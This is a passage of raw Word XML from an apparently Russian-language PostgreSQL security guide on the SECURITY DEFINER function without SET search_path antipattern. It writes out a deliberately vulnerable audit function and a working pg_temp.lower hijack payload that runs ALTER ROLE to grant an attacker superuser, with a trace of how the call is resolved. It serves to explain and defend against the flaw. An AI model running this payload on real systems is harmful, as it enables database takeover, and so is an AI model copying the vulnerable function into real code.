          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13.6 SECURITY DEFINER + SET search_path</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 атрибут функции, указывающий что её тело исполняется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">с привилегиями владельца функции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а не вызывающего. Это стандартный механизм PostgreSQL для безопасного делегирования (audit-logging, permission checks, encapsulated business logic). Опасный антипаттерн: SECURITY DEFINER без явного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в definition — вызывающий контролирует свой search_path, что позволяет ему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">подсунуть trojan-функцию в pg_temp и hijack-нуть любое unqualified-имя</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> внутри тела SECURITY DEFINER функции. Результат — arbitrary SQL под привилегиями owner-а (типично superuser или application-admin).</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не CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это документированное поведение PostgreSQL, известное с начала 2000-х. Защита тривиальна, но регулярно забывается в кодбазах. PostgreSQL Docs прямо предупреждает: «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Always set search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SECURITY DEFINER functions».</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DBA создаёт audit-trail функцию для логирования действий пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- audit_log принадлежит superuser, application-роли не имеют прямой доступ —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- только через эту SECURITY DEFINER обёртку.</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app.audit_action(user_name text, action text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS void LANGUAGE plpgsql SECURITY DEFINER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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INSERT INTO audit_log(user, action, ts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  VALUES (lower(user_name), action, now());</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owner функции — superuser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- USAGE на схему app + EXECUTE на функцию выданы PUBLIC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В function-теле — три unqualified-вызова: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now()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, неявный оператор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INSERT type-coercion. Каждый из них при выполнении проходит через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">вызывающего</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`SET search_path` в declaration отсутствует</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это ключевая mis-configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эквивалент в application-коде:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># app/api/v1/actions.py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@router.post("/actions")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def perform_action(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    action: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user_name = current_user_name()  # из JWT</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT app.audit_action(:u, :a)"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"u": user_name, "a": action},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{"status": "ok"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Application-роль вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">app.audit_action()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от своего имени. SECURITY DEFINER переключает контекст на owner (superuser), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path не сбрасывается</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это и есть точка эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — hijack unqualified-имени через pg_temp</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(от любой роли — pg_temp существует у каждой сессии и в search_path по умолчанию первым):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION pg_temp.lower(text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS text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эскалация: добавить атакующего в superuser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  EXECUTE 'ALTER ROLE postgres_attacker SUPERUSER';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -- возвращаем что-то правдоподобное чтобы INSERT прошёл</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN $1;</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(temp-schema сессии) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">всегда первая в search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, если не переопределено явно. Любая роль может создать в ней функцию — это temp-namespace, никаких ACL-проверок на CREATE.</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(вызвать SECURITY DEFINER функцию обычным способом):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT app.audit_action('alice', 'login');</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(внутри SECURITY DEFINER функции):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Контекст: current_user = superuser (owner функции)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- search_path: pg_temp, public, ... (от вызывающего)</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INSERT INTO audit_log(user, action, ts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VALUES (lower('alice'), 'login', now());</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ resolve lower('alice'):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--    1. pg_temp.lower(text) — НАЙДЕНО (атакующий создал) ← вызывается</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--    2. pg_catalog.lower(text) — игнорируется</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ pg_temp.lower выполняется под superuser (SECURITY DEFINER active)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ ALTER ROLE postgres_attacker SUPERUSER — успешно</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_temp.lower(text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет точно такую же сигнатуру как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_catalog.lower(text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Resolver идёт по search_path в порядке и берёт первое совпадение. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER ROLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> выполнен от superuser-роли — атакующий теперь superuser.</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Эскалация атакующей роли до owner SECURITY DEFINER функции (типично superuser). Дальше — стандартный набор векторов 3.7 (COPY PROGRAM, untrusted PL, lo_export для file-write). Атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не оставляет уникальных артефактов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — INSERT в audit_log выполнился, как и ожидалось; только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER ROLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в trail audit-логов (если они включены) укажет на эскалацию.</w:t>
      </w:r>
